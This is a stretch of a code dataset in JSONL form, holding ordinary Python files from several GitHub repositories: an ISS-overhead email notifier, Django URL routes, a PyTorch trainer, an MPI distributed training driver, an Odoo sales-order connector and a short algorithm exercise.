\r\n\r\npygame.quit()\r\n\r\n","repo_name":"Akasame0315/PythonProgram","sub_path":"testPy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35957977173","text":"import requests\nfrom datetime import datetime\nimport smtplib\nimport time\n\nMY_LAT = float(input(\"Enter your latitute\")) # latitude\nMY_LONG = float(input(\"Enter your longitude\")) # longitude\n\nmy_email = input(\"Enter your email: \")\npassword = input(\"Enter your email password: \")\n\n\n# Our position is within +5 or -5 degrees of ISS position\ndef is_iss_overhead():\n # iss position API\n iss_response = requests.get(url=\"http://api.open-notify.org/iss-now.json\")\n iss_response.raise_for_status()\n iss_data = iss_response.json()\n\n iss_longitude = float(iss_data[\"iss_position\"][\"longitude\"])\n iss_latitude = float(iss_data[\"iss_position\"][\"latitude\"])\n\n if (MY_LAT - 5 < iss_latitude < MY_LAT + 5) and (MY_LONG - 5 < iss_longitude < MY_LONG + 5):\n return True\n\n\n# to check if it is night\ndef is_night():\n parameters = {\n \"lat\": MY_LAT,\n \"lng\": MY_LONG,\n \"formatted\": 0,\n }\n\n # Our location info API\n response = requests.get(url=\"https://api.sunrise-sunset.org/json\", params=parameters)\n response.raise_for_status()\n data = response.json() # this data is in UTC add 5:30 hours for indian time zone\n sunrise = int(data[\"results\"][\"sunrise\"].split(\"T\")[1].split(\":\")[0])\n sunset = int(data[\"results\"][\"sunset\"].split(\"T\")[1].split(\":\")[0])\n\n # sunrise and sunset time as of indian time zone(5:30 hours ahead of UTC)\n sunrise_indian_time = (sunrise + 5) % 24\n sunset_indian_time = sunset + 5\n\n time_now = datetime.now().hour\n\n if time_now >= sunset_indian_time or time_now <= sunrise_indian_time:\n return True\n\n\nwhile True:\n time.sleep(60) # going to run every 60 sec\n # if it is night and iss is around us\n if is_iss_overhead() and is_night():\n with smtplib.SMTP(\"smtp.gmail.com\") as connection:\n connection.starttls()\n connection.login(user=my_email, password=password)\n connection.sendmail(from_addr=my_email,\n to_addrs=my_email,\n msg=f\"Subject:Look in the sky👆🙃\\n\\nISS is above you in the sky.\"\n )\n","repo_name":"ArunRawat404/API-related-Projects","sub_path":"ISS Overhead Notifier/iss_tracker.py","file_name":"iss_tracker.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3722991626","text":"import sys\r\n\r\nsys.stdin = open('1959numlists.txt')\r\n\r\n# 숫자 2개와 해당 숫자만큼의 길이를 가진 리스트 2개를 받아\r\n# 작은 리스트를 옮겨가며 자리에 맞는 값들을 곱한 후 모두 더해\r\n# 해당 더한 값들 중 최대값을 반환\r\ndef return_result(sm, lg, lst_sm, lst_lg):\r\n result = []\r\n for i in range(lg - sm + 1):\r\n tmp_lst = []\r\n for j in range(sm):\r\n tmp_lst.append(lst_lg[i + j] * lst_sm[j])\r\n result.append(sum(tmp_lst))\r\n return max(result)\r\n\r\n# tc는 testcase, n, m은 각 리스트의 길이\r\nt = int(input())\r\nfor tc in range(1, t + 1):\r\n n, m = map(int, input().split())\r\n lst_n = list(map(int, input().split()))\r\n lst_m = list(map(int, input().split()))\r\n\r\n if n <= m:\r\n print(f'#{tc} {return_result(n, m, lst_n, lst_m)}')\r\n else:\r\n print(f'#{tc} {return_result(m, n, lst_m, lst_n)}')\r\n\r\n\r\n\r\n # lst_a = [list(map(int,input().split())) for _ in range(n)]\r\n","repo_name":"hani2057/algorithm","sub_path":"swea/1006/1959numlists.py","file_name":"1959numlists.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32165418802","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('subscribe', views.subscribe, name='subscribe'),\n path('contacts', views.contacts, name='contacts'),\n path('about', views.about, name='about'),\n path('category', views.category, name='category'),\n path('thank', views.thank, name='thank'),\n\n# path('books', views.books, name='books'),\n# path('e-books', views.e_books, name='e-books'),\n# path('sale', views.sale, name='sale'),\n# path('t-shirts', views.t_shirts, name='t-shirts'),\n\n# path('create', views.create, name='create'),\n]\n","repo_name":"AlexandreMagnesium/bookstore","sub_path":"bookstore/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70778489849","text":"from setuptools import setup, find_packages\n\nVERSION = '0.1.0'\nDESCRIPTION = 'PySteganography - A simple toolset for image encoding and decoding using steganography.'\nLONG_DESCRIPTION = 'A package that provides developers the necessary functions to implement steganography in image files through the least significant bit (LSB) technique.\\nView examples and features on github: https://github.com/deetsadi/pysteganography'\n\nsetup(\n name=\"pysteganography\",\n version=VERSION,\n author=\"deetsadi (Aditya Sridhar)\",\n author_email=\"\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=LONG_DESCRIPTION,\n package_dir={\"\": \"src\"},\n packages=find_packages(where=\"src\"),\n download_url=\"https://github.com/deetsadi/pysteganography/archive/refs/tags/v_01.tar.gz\",\n install_requires=['opencv-python', 'numpy'],\n keywords=['python', 'steganography', 'cybersecurity', 'images', 'sound', 'security'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ],\n python_requires=\">=3.6\"\n)\n","repo_name":"deetsadi/pysteganography","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15242491541","text":"\"\"\"\nA trainer class.\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\n\n#from model.gcn import GCNClassifier\nfrom model.gcn_lstm_elmo_cdr import GCNClassifier\nfrom utils import constant, torch_utils\n\nclass Trainer(object):\n def __init__(self, opt,knowledge_emb=None,word_emb=None):\n raise NotImplementedError\n\n def update(self, batch):\n raise NotImplementedError\n\n def predict(self, batch):\n raise NotImplementedError\n\n def update_lr(self, new_lr):\n torch_utils.change_lr(self.optimizer, new_lr)\n\n def load(self, filename):\n try:\n checkpoint = torch.load(filename)\n except BaseException:\n print(\"Cannot load model from {}\".format(filename))\n exit()\n self.model.load_state_dict(checkpoint['model'])\n self.opt = checkpoint['config']\n\n def save(self, filename):\n params = {\n 'model': self.model.state_dict(),\n 'config': self.opt,\n }\n try:\n torch.save(params, filename)\n print(\"model saved to {}\".format(filename))\n except BaseException:\n print(\"[Warning: Saving failed... continuing anyway.]\")\n\n\ndef unpack_batch(batch, cuda):\n \"\"\"\n 20\n tokens_elmoid, masks, pos, head,\n subj_mask, obj_mask, dis1, dis2,\n all_two_mesh_index, token_id, subj_positions, obj_positions,\n rels, orig_idx, batch[0], batch[7],\n batch[8], batch[14], batch[15],batch[16]\n \"\"\"\n labels = batch[16]\n if cuda:\n inputs = [b.cuda() for b in batch[:16]]\n labels = labels.cuda()\n else:\n inputs = [b for b in batch[:16]]\n labels = labels\n return inputs, labels\n\nclass GCNTrainer(Trainer):\n def __init__(self, opt,knowledge_emb=None,word_emb=None):\n self.opt = opt\n self.knowledge_emb = knowledge_emb\n self.word_emb=word_emb\n self.model = GCNClassifier(opt,knowledge_emb=knowledge_emb,word_emb=word_emb)\n #print(self.model)\n self.criterion = nn.BCEWithLogitsLoss()\n\n self.parameters = [p for p in self.model.parameters() if p.requires_grad]\n if opt['cuda']:\n self.model.cuda()\n self.criterion.cuda()\n self.optimizer = torch_utils.get_optimizer(opt['optim'], self.parameters, opt['lr'])\n\n def update(self, batch):\n inputs, labels = unpack_batch(batch, self.opt['cuda'])\n # step forward\n self.model.train()\n self.optimizer.zero_grad()\n logits= self.model(inputs)\n #loss = self.criterion(logits, labels )\n loss = self.criterion(logits.squeeze(dim=-1), labels)\n #if loss>10.0:\n #print(loss,logits,labels)\n #print(inputs)\n # l2 decay on all conv layers\n #print(self.opt.get('conv_l2', 0) )\n '''\n if self.opt.get('conv_l2', 0) > 0:\n loss += self.model.conv_l2() * self.opt['conv_l2']\n '''\n loss_val = loss.item()\n # backward\n loss.backward()\n #torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.opt['max_grad_norm'])\n self.optimizer.step()\n return loss_val\n\n def predict(self, batch,unsort=True):\n inputs, labels= unpack_batch(batch, self.opt['cuda'])\n #orig_idx = batch[8]\n # forward\n self.model.eval()\n\n logits = self.model(inputs)\n\n loss = self.criterion(logits.squeeze(dim=-1), labels)\n #print(loss.item())\n #probs = F.softmax(logits, 1).data.cpu().numpy().tolist()\n probs = torch.sigmoid(logits).data.cpu().numpy().tolist()\n predictions = np.argmax(logits.data.cpu().numpy(), axis=1).tolist()\n '''\n if unsort:\n _, predictions, probs = [list(t) for t in zip(*sorted(zip(orig_idx,\\\n predictions, probs)))]\n '''\n return predictions, probs, loss.item()\n","repo_name":"sunyi123/cdr","sub_path":"model/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"36592892492","text":"#!/usr/bin/env python3\n\n### This script creates an MPIManager object and launches distributed training.\n\nimport sys,os\nimport numpy as np\nimport argparse\nimport json\nimport re\nimport logging\nimport glob\n\nfrom mpi4py import MPI\nfrom time import time,sleep\n\nfrom nnlo.mpi.manager import MPIManager, get_device\nfrom nnlo.train.algo import Algo\nfrom nnlo.train.data import H5Data\nfrom nnlo.train.model import ModelFromJson, ModelTensorFlow, ModelPytorch\nfrom nnlo.util.utils import import_keras\nfrom nnlo.util.timeline import Timeline\nfrom nnlo.util.logger import initialize_logger\n\ndef make_Block_Parser():\n pass\ndef add_log_option(parser):\n # logging configuration\n parser.add_argument('--log-file', default=None, dest='log_file', help='log file to write, in additon to output stream')\n parser.add_argument('--log-level', default='info', dest='log_level', help='log level (debug, info, warn, error)')\n\ndef add_master_option(parser):\n parser.add_argument('--master-gpu',help='master process should get a gpu',\n action='store_true', dest='master_gpu')\n parser.add_argument('--synchronous',help='run in synchronous mode',action='store_true')\n \ndef add_worker_options(parser):\n parser.add_argument('--worker-optimizer',help='optimizer for workers to use',\n dest='worker_optimizer', default='adam')\n parser.add_argument('--worker-optimizer-params',help='worker optimizer parameters (string representation of a dict)',\n dest='worker_optimizer_params', default='{}')\n \n \ndef add_gem_options(parser):\n parser.add_argument('--gem-lr',help='learning rate for GEM',type=float,default=0.01, dest='gem_lr')\n parser.add_argument('--gem-momentum',help='momentum for GEM',type=float, default=0.9, dest='gem_momentum')\n parser.add_argument('--gem-kappa',help='Proxy amplification parameter for GEM',type=float, default=2.0, dest='gem_kappa') \n\ndef add_easgd_options(parser):\n parser.add_argument('--elastic-force',help='beta parameter for EASGD',type=float,default=0.9)\n parser.add_argument('--elastic-lr',help='worker SGD learning rate for EASGD',\n type=float, default=1.0, dest='elastic_lr')\n parser.add_argument('--elastic-momentum',help='worker SGD momentum for EASGD',\n type=float, default=0, dest='elastic_momentum')\n\ndef add_downpour_options(parser):\n parser.add_argument('--optimizer',help='optimizer for master to use in downpour',default='adam')\n\n\ndef add_loader_options(parser):\n parser.add_argument('--preload-data', help='Preload files as we read them', default=0, type=int, dest='data_preload')\n parser.add_argument('--cache-data', help='Cache the input files to a provided directory', default='', dest='caching_dir')\n parser.add_argument('--copy-command', help='Specific command line to copy the data into the cache. Expect a string with two {} first is the source (from input file list), second is the bare file name at destination. Like \"cp {} {}\"', default=None, dest='copy_command')\n\n\ndef add_target_options(parser):\n parser.add_argument('--early-stopping', default=None,\n dest='early_stopping', help='patience for early stopping')\n parser.add_argument('--target-metric', default=None,\n dest='target_metric', help='Passing configuration for a target metric')\n \n\ndef make_train_parser():\n parser = argparse.ArgumentParser() \n parser.add_argument('--timeline',help='Record timeline of activity', action='store_true')\n add_train_options(parser)\n\n return parser\n\ndef add_checkpoint_options(parser):\n parser.add_argument('--restore', help='pass a file to retore the variables from', default=None)\n parser.add_argument('--checkpoint', help='Base name of the checkpointing file. If omitted no checkpointing will be done', default=None)\n parser.add_argument('--checkpoint-interval', help='Number of epochs between checkpoints', default=5, type=int, dest='checkpoint_interval')\n \ndef add_train_options(parser):\n parser.add_argument('--verbose',help='display metrics for each training batch',action='store_true')\n parser.add_argument('--monitor',help='Monitor cpu and gpu utilization', action='store_true')\n\n parser.add_argument('--backend', help='specify the backend to be used', choices= ['keras','torch'],default='keras')\n parser.add_argument('--thread_validation', help='run a single process', action='store_true')\n \n # model arguments\n parser.add_argument('--model', help='File containing model architecture (serialized in JSON/pickle, or provided in a .py file')\n parser.add_argument('--trial-name', help='descriptive name for trial', \n default='train', dest='trial_name')\n\n # training data arguments\n parser.add_argument('--train_data', help='text file listing data inputs for training', default=None)\n parser.add_argument('--val_data', help='text file lis`ting data inputs for validation', default=None)\n parser.add_argument('--features-name', help='name of HDF5 dataset with input features',\n default='features', dest='features_name')\n parser.add_argument('--labels-name', help='name of HDF5 dataset with output labels',\n default='labels', dest='labels_name')\n \n parser.add_argument('--batch', help='batch size', default=100, type=int)\n\n \n\n # configuration of network topology\n parser.add_argument('--n-masters', dest='n_masters', help='number of master processes', default=1, type=int)\n parser.add_argument('--n-processes', dest='n_processes', help='number of processes per worker', default=1, type=int)\n parser.add_argument('--max-gpus', dest='max_gpus', help='max GPUs to use', type=int, default=1)\n\n\n # configuration of training process\n parser.add_argument('--epochs', help='number of training epochs', default=1, type=int)\n\n parser.add_argument('--loss',help='loss function',default='binary_crossentropy')\n\n add_target_options(parser)\n\n add_worker_options(parser)\n\n parser.add_argument('--sync-every', help='how often to sync weights with master', \n default=1, type=int, dest='sync_every')\n parser.add_argument('--mode',help='Mode of operation.'\n 'One of \"downpour\" (Downpour), \"easgd\" (Elastic Averaging SGD) or \"gem\" (Gradient Energy Matching)',default='gem',choices=['downpour','easgd','gem'])\n\n add_master_option(parser)\n add_gem_options(parser)\n add_easgd_options(parser)\n add_downpour_options(parser)\n \n add_loader_options(parser)\n \n add_log_option(parser)\n add_checkpoint_options(parser)\n\ndef make_loader( args, features_name, labels_name, train_list):\n data = H5Data( batch_size=args.batch,\n cache = args.caching_dir,\n copy_command = args.copy_command, \n preloading = args.data_preload,\n features_name=features_name,\n labels_name=labels_name,\n )\n # We initialize the Data object with the training data list\n # so that we can use it to count the number of training examples\n data.set_full_file_names( train_list )\n \n return data\n\ndef make_model_weight(args, use_torch):\n model_weights = None\n if args.restore:\n args.restore = re.sub(r'\\.algo$', '', args.restore)\n if os.path.isfile(args.restore + '.latest'):\n with open(args.restore + '.latest', 'r') as latest:\n args.restore = latest.read().splitlines()[-1]\n if any([os.path.isfile(ff) for ff in glob.glob('./*'+args.restore + '.model')]):\n if use_torch:\n args.model = args.restore + '.model'\n model_weights = args.restore +'.model_w'\n else:\n model_weights = args.restore + '.model'\n \n return model_weights\n \ndef make_algo( args, use_tf, comm, validate_every ):\n args_opt = args.optimizer\n if use_tf:\n if not args_opt.endswith(\"tf\"):\n args_opt = args_opt + 'tf'\n else:\n if not args_opt.endswith(\"torch\"):\n args_opt = args_opt + 'torch'\n \n if args.mode == 'easgd':\n algo = Algo(None, loss=args.loss, validate_every=validate_every,\n mode='easgd', sync_every=args.sync_every,\n worker_optimizer=args.worker_optimizer,\n worker_optimizer_params=args.worker_optimizer_params,\n elastic_force=args.elastic_force/(max(1,comm.Get_size()-1)),\n elastic_lr=args.elastic_lr, \n elastic_momentum=args.elastic_momentum) \n elif args.mode == 'gem':\n algo = Algo('gem', loss=args.loss, validate_every=validate_every,\n mode='gem', sync_every=args.sync_every,\n worker_optimizer=args.worker_optimizer,\n worker_optimizer_params=args.worker_optimizer_params,\n learning_rate=args.gem_lr, momentum=args.gem_momentum, kappa=args.gem_kappa)\n elif args.mode == 'downpour':\n algo = Algo(args_opt, loss=args.loss, validate_every=validate_every,\n sync_every=args.sync_every, worker_optimizer=args.worker_optimizer,\n worker_optimizer_params=args.worker_optimizer_params)\n else:\n logging.info(\"%s not supported mode\", args.mode)\n return algo\n\ndef make_train_val_lists(m_module, args):\n train_list = val_list = []\n if args.train_data:\n with open(args.train_data) as train_list_file:\n train_list = [ s.strip() for s in train_list_file.readlines() ]\n elif m_module is not None:\n train_list = m_module.get_train()\n else:\n logging.info(\"no training data provided\")\n \n if args.val_data:\n with open(args.val_data) as val_list_file:\n val_list = [ s.strip() for s in val_list_file.readlines() ]\n elif m_module is not None:\n val_list = m_module.get_val()\n else:\n logging.info(\"no validation data provided\")\n\n if not train_list:\n logging.error(\"No training data provided\")\n if not val_list:\n logging.error(\"No validation data provided\")\n return (train_list, val_list) \n\ndef make_features_labels(m_module, args):\n features_name = m_module.get_features() if m_module is not None and hasattr(m_module,\"get_features\") else args.features_name\n labels_name = m_module.get_labels() if m_module is not None and hasattr(m_module,\"get_labels\") else args.labels_name\n return (features_name, labels_name)\n\nif __name__ == '__main__':\n parser = make_train_parser()\n args = parser.parse_args() \n initialize_logger(filename=args.log_file, file_level=args.log_level, stream_level=args.log_level)\n\n a_backend = args.backend\n if 'torch' in args.model:\n a_backend = 'torch'\n \n m_module = __import__(args.model.replace('.py','').replace('/', '.'), fromlist=[None]) if '.py' in args.model else None\n (features_name, labels_name) = make_features_labels(m_module, args)\n (train_list, val_list) = make_train_val_lists(m_module, args)\n comm = MPI.COMM_WORLD.Dup()\n\n if args.timeline: Timeline.enable()\n\n use_tf = a_backend == 'keras'\n use_torch = not use_tf\n\n model_weights = make_model_weight(args, use_torch)\n\n # Theano is the default backend; use tensorflow if --tf is specified.\n # In the theano case it is necessary to specify the device before importing.\n device = get_device( comm, args.n_masters, gpu_limit=args.max_gpus,\n gpu_for_master=args.master_gpu)\n os.environ['CUDA_VISIBLE_DEVICES'] = device[-1] if 'gpu' in device else ''\n logging.debug('set to device %s',os.environ['CUDA_VISIBLE_DEVICES'])\n\n if use_torch:\n logging.debug(\"Using pytorch\")\n model_builder = ModelPytorch(comm, source=args.model, weights=model_weights, gpus=1 if 'gpu' in device else 0)\n else:\n logging.debug(\"Using TensorFlow\")\n os.environ['KERAS_BACKEND'] = 'tensorflow'\n\n import_keras()\n import keras.backend as K\n gpu_options=K.tf.GPUOptions(\n per_process_gpu_memory_fraction=0.1, #was 0.0\n allow_growth = True,\n visible_device_list = device[-1] if 'gpu' in device else '')\n gpu_options=K.tf.GPUOptions(\n per_process_gpu_memory_fraction=0.0,\n allow_growth = True,) \n #NTHREADS=(2,1)\n NTHREADS=None\n if NTHREADS is None:\n K.set_session( K.tf.Session( config=K.tf.ConfigProto(\n allow_soft_placement=True, log_device_placement=False,\n gpu_options=gpu_options\n ) ) )\n else:\n K.set_session( K.tf.Session( config=K.tf.ConfigProto(\n allow_soft_placement=True, log_device_placement=False,\n gpu_options=gpu_options,\n intra_op_parallelism_threads=NTHREADS[0], \n inter_op_parallelism_threads=NTHREADS[1],\n ) ) )\n \n\n model_builder = ModelTensorFlow( comm, source=args.model, weights=model_weights)\n\n\n data = make_loader(args, features_name, labels_name, train_list)\n\n # Some input arguments may be ignored depending on chosen algorithm\n algo = make_algo( args, use_tf, comm, validate_every=int(data.count_data()/args.batch ))\n \n if args.restore:\n algo.load(args.restore)\n\n # Creating the MPIManager object causes all needed worker and master nodes to be created\n manager = MPIManager( comm=comm, data=data, algo=algo, model_builder=model_builder,\n num_epochs=args.epochs, train_list=train_list, val_list=val_list, \n num_masters=args.n_masters, num_processes=args.n_processes,\n synchronous=args.synchronous, \n verbose=args.verbose, monitor=args.monitor,\n early_stopping=args.early_stopping,\n target_metric=args.target_metric,\n thread_validation = args.thread_validation,\n checkpoint=args.checkpoint, checkpoint_interval=args.checkpoint_interval)\n\n\n if m_module:\n model_name =m_module.get_name()\n else:\n model_name = os.path.basename(args.model).replace('.json','')\n\n json_name = '_'.join([model_name,args.trial_name,\"history.json\"])\n tl_json_name = '_'.join([model_name,args.trial_name,\"timeline.json\"])\n\n # Process 0 launches the training procedure\n if comm.Get_rank() == 0:\n logging.debug('Training configuration: %s', algo.get_config())\n\n t_0 = time()\n histories = manager.process.train() \n delta_t = time() - t_0\n logging.info(\"Training finished in {0:.3f} seconds\".format(delta_t))\n\n manager.process.record_details(json_name,\n meta={\"args\":vars(args)}) \n logging.info(\"Wrote trial information to {0}\".format(json_name))\n manager.close()\n\n comm.barrier()\n logging.info(\"Terminating\")\n if args.timeline: Timeline.collect(clean=True, file_name=tl_json_name)\n","repo_name":"vlimant/NNLO","sub_path":"TrainingDriver.py","file_name":"TrainingDriver.py","file_ext":"py","file_size_in_byte":15051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"75016774007","text":"from django.urls import path\n\nfrom .views import *\n\nurlpatterns = [\n path('login/', UserLoginView.as_view(), name='user_login'),\n path('logout/', UserLogoutView.as_view(), name='user_logout'),\n path('register', UserRegistrationView.as_view(), name='user_register'),\n path('edit_profile/', UserEditView.as_view(), name='edit_profile'),\n path('password/', PasswordsChangeView.as_view(), name='password'),\n path('create_note/', CreateNoteView.as_view(), name='create_note'),\n path('edit_note//', EditNoteView.as_view(), name='edit_note'),\n path('delete_note//', delete_note, name=\"delete_note\"),\n path('detail_note//', DetailNoteView.as_view(), name='detail_note'),\n path('my_notes/', MyNotesView.as_view(), name='my_notes'),\n path('set_like//', like_post, name='set_like'),\n path('set_dislike//', dislike_post, name='set_dislike'),\n path('draft/', DraftNotesView.as_view(), name='draft_notes'),\n path('subscriptions/', SubscriptionsView.as_view(), name='subscriptions'),\n path('unfollow_user//', unfollow_user, name='unfollow_user'),\n path('subscribers/', SubscribersView.as_view(), name='subscribers'),\n path('unsubscribe_from_user//', unsubscribe_from_user, name='unsubscribe_from_user'),\n path('all_users/', AllUsersView.as_view(), name='all_users'),\n path('speaker//', SpeakerNotesView.as_view(), name='speaker'),\n path('subscribe_to_user//', subscribe_to_user, name='subscribe_to_user')\n]\n","repo_name":"AgentRediska/BlogDjango","sub_path":"blog/board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27547770226","text":"import json\nimport logging\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError, ValidationError\nfrom ..tools import DateTimeToOdoo, CleanDataDict\n\n_logger = logging.getLogger(__name__)\n\n\n\n\n\n\n\n\n\nclass sale_order(models.Model):\n _name = 'sale.order'\n _inherit = [\"custom.connector.spt\",\"sale.order\"]\n _TTRxKey = 'uuid'\n _OdooToTTRx = {'uuid':'uuid'}\n _TTRxToOdoo = {'uuid':'uuid'}\n \n uuid = fields.Char(\"UUID\", copy=False)\n source_location = fields.Many2one('stock.location', string=\"Source Location\") #TODO: Verificar\n send_to_ttr2 = fields.Boolean('Send to TTRx', default=False)\n \n def FromOdooToTTRx(self, values={}):\n var = super().FromOdooToTTRx(values=values)\n\n #TODO: Tratamento quando o partner nao for da TTRx\n if not bool(self.partner_id.uuid):\n partner_uuid = self.partner_id.CreateInTTRx()\n else:\n partner_uuid = self.partner_id.uuid\n\n item_lines = []\n for line in self.order_line:\n if bool(line.product_id.product_spt_id):\n vals = {\n \"product_uuid\": line.product_id.product_spt_id.uuid, \n \"quantity\": int(line.product_uom_qty), \n \"sort_order\": line.id,\n }\n item_lines.append(vals)\n else:\n #TODO: Tratamento de quando o produto nao estiver na TTRx\n raise UserError(\"Product \" + line.product_id.name + \" does not exist in TTR system.\")\n\n if not self.source_location.location_spt_id.uuid:\n #TODO: Tratamento de quando o default location não estiver na TTRx\n raise UserError(\"Location \" + self.source_location.name + \" does not exist in TTR system.\")\n else:\n location_uuid = self.source_location.location_spt_id.uuid\n\n var.update({\n \"transaction_type\": \"sales\",\n \"location_uuid\": location_uuid,\n \"trading_partner_uuid\": partner_uuid,\n \"transaction_date\": str(self.date_order.date()),\n \"po_nbr\": str(self.name),\n \"line_items\": json.dumps(item_lines),\n \"sold_by_address_custom_recipient_name\": self.company_id.name,\n \"sold_by_address_custom_line1\": self.company_id.street or None,\n \"sold_by_address_custom_line2\": self.company_id.street2 or None,\n \"sold_by_address_custom_country_code\": self.company_id.country_id.code or None,\n \"sold_by_address_custom_country_name\": self.company_id.country_id.name or None,\n \"sold_by_address_custom_city\": self.company_id.city or None,\n \"sold_by_address_custom_zip\": self.company_id.zip or None,\n \"sold_by_address_custom_phone\": self.company_id.phone or None,\n \"sold_by_address_custom_email\": self.company_id.email or None,\n \"ship_from_address_custom_recipient_name\": self.company_id.name,\n \"ship_from_address_custom_line1\": self.company_id.street or None,\n \"ship_from_address_custom_line2\": self.company_id.street2 or None,\n \"ship_from_address_custom_country_code\": self.company_id.country_id.code or None,\n \"ship_from_address_custom_country_name\": self.company_id.country_id.name or None,\n \"ship_from_address_custom_city\": self.company_id.city or None,\n \"ship_from_address_custom_zip\": self.company_id.zip or None,\n \"ship_from_address_custom_phone\": self.company_id.phone or None,\n \"ship_from_address_custom_email\": self.company_id.email or None,\n \"billing_address_custom_recipient_name\": self.partner_id.name,\n \"billing_address_custom_line1\": self.partner_id.street or None,\n \"billing_address_custom_line2\": self.partner_id.street2 or None,\n \"billing_address_custom_country_code\": self.partner_id.country_id.code or None,\n \"billing_address_custom_country_name\": self.partner_id.country_id.name or None,\n \"billing_address_custom_city\": self.partner_id.city or None,\n \"billing_address_custom_zip\": self.partner_id.zip or None,\n \"billing_address_custom_phone\": self.partner_id.phone or None,\n \"billing_address_custom_email\": self.partner_id.email or None,\n \"ship_to_address_custom_recipient_name\": self.partner_id.name,\n \"ship_to_address_custom_line1\": self.partner_id.street or None,\n \"ship_to_address_custom_line2\": self.partner_id.street2 or None,\n \"ship_to_address_custom_country_code\": self.partner_id.country_id.code or None,\n \"ship_to_address_custom_country_name\": self.partner_id.country_id.name or None,\n \"ship_to_address_custom_city\": self.partner_id.city or None,\n \"ship_to_address_custom_zip\": self.partner_id.zip or None,\n \"ship_to_address_custom_phone\": self.partner_id.phone or None,\n \"ship_to_address_custom_email\": self.partner_id.email or None,\n \"is_approved\": True,\n # \"is_approved_is_ship_transaction\": True,\n })\n CleanDataDict(var)\n return var\n \n def FromTTRxToOdoo(self, values):\n var = super().FromTTRxToOdoo(values=values)\n order_lines = self.FromLinesTTRxToOdoo(values['line_items'])\n new_order_lines = []\n if self.search_count([('uuid','=',values['uuid'])]) > 0:\n for line in order_lines:\n nid = line.pop('id')\n new_order_lines += [(1,nid,line)]\n else:\n new_order_lines += [(5,)]\n for line in order_lines:\n line.pop('id')\n new_order_lines += [(0,0,line)]\n\n var.update({\n 'order_line': new_order_lines,\n })\n CleanDataDict(var)\n return var\n\n def FromLinesTTRxToOdoo(self, ttr_lines):\n order_line = []\n for ttr_line in ttr_lines:\n product_uuid = ttr_line['product']['uuid']\n product_id = self.env['product.spt'].search([('uuid','=',product_uuid)],limit=1).product_id\n var = {\n 'uuid': ttr_line.get('uuid'),\n 'product_id': product_id.id,\n 'product_uom': product_id.uom_id.id,\n 'name': product_id.name,\n 'product_uom_qty': ttr_line.get('quantity'),\n 'id': int(ttr_line['sort_order']) if bool(ttr_line.get('sort_order')) else None,\n }\n CleanDataDict(var)\n order_line.append(var)\n return order_line\n \n \n\n\n def CreateInTTRx(self, **params):\n resource = \"%s\" % self._name\n params['data'] = self.FromOdooToTTRx()\n if bool(self.BeforeCreateInOdoo(**params)):\n create_response = self._PostRecord(self.connector_id, resource, **params) \n if bool(create_response) and not bool(create_response.get('erro')):\n context = dict(self.env.context or {})\n context['no_rewrite'] = True\n self.with_context(context).write(create_response)\n response, data = self.env['sale.order'].GetValuesInTTRx(self.connector_id,uuid=create_response['uuid'])\n order_line = []\n for line in data['order_line']:\n order_line += [(1,line[1],{'uuid': line[2]['uuid']})]\n self.with_context(context).write({'order_line': order_line})\n \n self.AfterCreateInOdoo(**params)\n return True\n\n\n def DeleteInTTRx(self, **params):\n self.ensure_one\n if self.uuid:\n res = {'erro': 'Delete is not possible after transaction to TTRX2'}\n return res\n \n \n \n \n \n \n def action_confirm(self):\n res = super(sale_order, self).action_confirm()\n for record in self:\n record.CreateInTTRx()\n return res\n \n \n \n @api.model\n def create(self, values):\n if 'order_line' in values:\n res = super(sale_order, self).create(values)\n return res\n else:\n raise ValidationError('Order Line is not Selected.')\n \n \n \n \n def write(self, values):\n res = super(sale_order, self).write(values)\n if len(self.order_line) == 0:\n raise ValidationError('Order Line is not Selected.')\n else:\n return res\n\n # TTRX2 not support delete sales order so we disabled the process.\n def action_cancel(self):\n res = super(sale_order, self).action_cancel()\n for reg in self:\n if reg.uuid:\n raise UserError(\"Cancellation not possible after transaction to TTRX2\")\n return res\n\nclass SaleOrderLine(models.Model):\n _inherit = 'sale.order.line'\n \n uuid = fields.Char('UUID from TTR', copy=False, readonly=True)\n","repo_name":"DerikBortoletto/odootest","sub_path":"odoo_addons/customers/TrackTraceRx-TTR2/ttrx2_connector_spt_mrp/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":8831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9420976461","text":"import sys\nfrom proc_utils import cmd_exec # pylint: disable=import-error\nfrom install_pkg import get_openvino_environment # pylint: disable=import-error\n\n\ndef test_infer(test_id, model, artifacts):\n \"\"\" Test inference with conditional compiled binaries\n \"\"\"\n install_prefix = artifacts / test_id / \"install_pkg\"\n 